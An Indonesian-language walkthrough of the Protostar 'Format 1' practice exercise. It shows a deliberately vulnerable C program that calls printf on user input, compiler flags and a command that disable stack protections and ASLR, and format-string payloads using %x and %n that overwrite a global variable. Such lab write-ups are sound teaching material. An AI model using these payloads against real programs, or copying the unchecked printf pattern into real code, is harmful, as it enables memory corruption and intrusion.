Protostar Format 1

Alat dan Bahan

• Fail: vuln.c
• Kompiler: GCC
• Sistem operasi: Ubuntu 16.04 dengan arsitektur 64 bit.

Mengatur Lingkungan Pekerjaan

1. Source Code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln(char *string)
{
  printf(string);

  if(target) {
      printf("you have modified the target :)\n");
  }
}

int main(int argc, char **argv)
{
  vuln(argv[1]);
}

1. Kompilasi

gcc -m32 -fno-stack-protector -z execstack -mpreferred-stack-boundary=4 -o vuln -ggdb vuln.c

Penjelasan

-m32
Kompilasi source code menjadi binary dengan arsitektur 32 bit atau x86.

-fno-stack-protector
Kompilasi source code menjadi binary tanpa pelindung stack (canary).

-z execstack
Berguna mengaktifkan status stack agar dapat dieksekusi

-mpreferred-stack-boundary
Pada dasarnya, GCC akan mengkompilasi kode pada setiap fungsi sesuai urutan, masing-masing memiliki stack pointer dengan alinea 16-byte bondary (ini sangat penting jika program memiliki variabel lokal dan bisa juga digunakan untuk mengaktifkan instruksi sse2.
Jika parameter dirubah menjadi -mpreferred-stack-boundary=2 maka GCC akan menyusun stack pointer pada 4-byte-boundary. Ini akan menguangi kebutuhan stack didalam program, tetapi akan terjadi crash jika kode program yang dipanggil menggunakan sse2, sehingga secara umum menjadi program hasil kompilasi menjadi tidak aman.

-ggdb
Digunakan untuk menghasilkan informasi pada saat proses debugging ketika menggunakan GDB. Dengan kata lain format ekspresif telah disediakan (DWARF 2, stabs, atau fomat native lainnya jika tidak didukung), termasuk ekstensi GDB.

1. Mematikan ASLR

Matikan ASLR agar proses eksploitasi lebih mudah. Untuk mematikannya gunakan perintah berikut:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Identifikasi Kelemahan

Berdasarkan source code diatas terdapat kelemahan format string pada fungsi printf. Tujuan akhirnya adalah menimpa variabel target dengan nilai selain 0. Informasi yang diperlukan adalah mengatur isi arbitrary memory pada lokasi yang dinginkan dengan dengan buffer misal AAAA yang jika dikonversi hexadecimal menjadi 41414141.

Lokasi yang diinginkan adalah alamat variabel target.

objdump -t vuln | grep target
0804a024 g     O .bss   00000004              target

Mencari jumlah bytes yang tepat untuk menimpa variabel target.

./vuln "`python -c "print 'AAAAA'+'\x24\xa0\x04\x08' + 'CCCC'+'%x.'*155+'%x'"`"

...

41414141.804a024

Jaraknya sekitar 155 bytes.

Eksploitasi

Untuk menyelesaikannya, gunakan %n untuk menulis ke arbitrary memory.

./vuln "`python -c "print 'AAAAA'+'\x24\xa0\x04\x08' + 'CCCC'+'%x.'*155+'%n'"`"

Luaran

41414141.you have modified the target :)

Referensi

• https://stackoverflow.com/questions/3401156/what-is-the-use-of-the-n-format-specifier-in-c
• https://exploit-exercises.com/protostar/format1/
• https://www.youtube.com/watch?v=0WvrSfcdq1I